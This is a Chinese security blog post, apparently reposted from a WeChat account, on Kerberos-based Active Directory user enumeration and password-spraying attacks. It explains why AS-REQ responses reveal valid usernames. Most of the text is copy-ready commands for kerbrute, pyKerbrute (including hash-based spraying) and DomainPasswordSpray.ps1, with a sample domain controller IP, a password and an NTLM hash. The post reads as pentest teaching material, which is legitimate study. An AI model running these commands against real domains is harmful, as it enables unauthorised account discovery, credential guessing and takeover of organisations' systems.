点击蓝字 关注我们
免责声明
本文发布的工具和脚本,仅用作测试和学习研究,禁止用于商业用途,不能保证其合法性,准确性,完整性和有效性,请根据情况自行判断。
如果任何单位或个人认为该项目的脚本可能涉嫌侵犯其权利,则应及时通知并提供身份证明,所有权证明,我们将在收到认证文件后删除相关内容。
文中所涉及的技术、思路及工具等相关知识仅供安全为目的的学习使用,任何人不得将其应用于非法用途及盈利等目的,间接使用文章中的任何工具、思路及技术,我方对于由此引起的法律后果概不负责。
添加星标不迷路
由于公众号推送规则改变,微信头条公众号信息会被折叠,为了避免错过公众号推送,请大家动动手指设置“星标”,设置之后就可以和从前一样收到推送啦
一、前言
在 Kerberos 协议认证的 AS-REQ 阶段,cname 的值是用户名。当用户不存在时,返回包提示错误。当用户名存在,密码正确和密码错误时,AS-REP的返回包不一样。所以可以利用这点,对域内进行域用户枚举和密码喷洒攻击
二、域内用户枚举
1.kerbrute
https://github.com/ropnop/kerbrute/releases#下载地址
需要获取dc的ip,域名,如这里将想要爆破的用户放入user.txt中。
.kerbrute_windows_amd64.exe userenum --dc 192.168.30.12 -d test.com .user.txt
2.PY版本pyKerbrute
https://github.com/3gstudent/pyKerbrute#下载地址
用Python写的版本,使用同样需要DC的IP、域名,如这里将想要爆破的用户放入user.txt
python2 EnumADUser.py 192.168.30.12 test.com user.txt udp
或
python2 EnumADUser.py 192.168.30.12 test.com user.txt tcp
三、密码喷洒攻击
密码喷洒,是用固定的密码去跑用户名。
1.kerbrute
.kerbrute_windows_amd64.exe passwordspray --dc 192.168.30.12 -d test.com .user.txt passw12#
2.PY版本 pyKerbrute
针对明文进行喷洒
python2 ADPwdSpray.py 192.168.30.12 test.com user.txt clearpassword passw12# tcp
针对哈希进行喷洒
python2 ADPwdSpray.py 192.168.30.12 test.com user.txt ntlmhash F6502CBE4802F94AB472288970C124CD udp
3.DomainPasswordSpray.ps1
默认情况下它将利用LDAP从域中导出用户列表,然后扣掉被锁定的用户,再用固定密码进行密码喷洒。需要使用域权限账户
https://github.com/dafthack/DomainPasswordSpray#下载地址
使用如下
Import-Module .DomainPasswordSpray.ps1
Invoke-DomainPasswordSpray -Password 密码
原文始发于微信公众号(SecHub网络安全社区):域内用户枚举和密码喷洒攻击
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论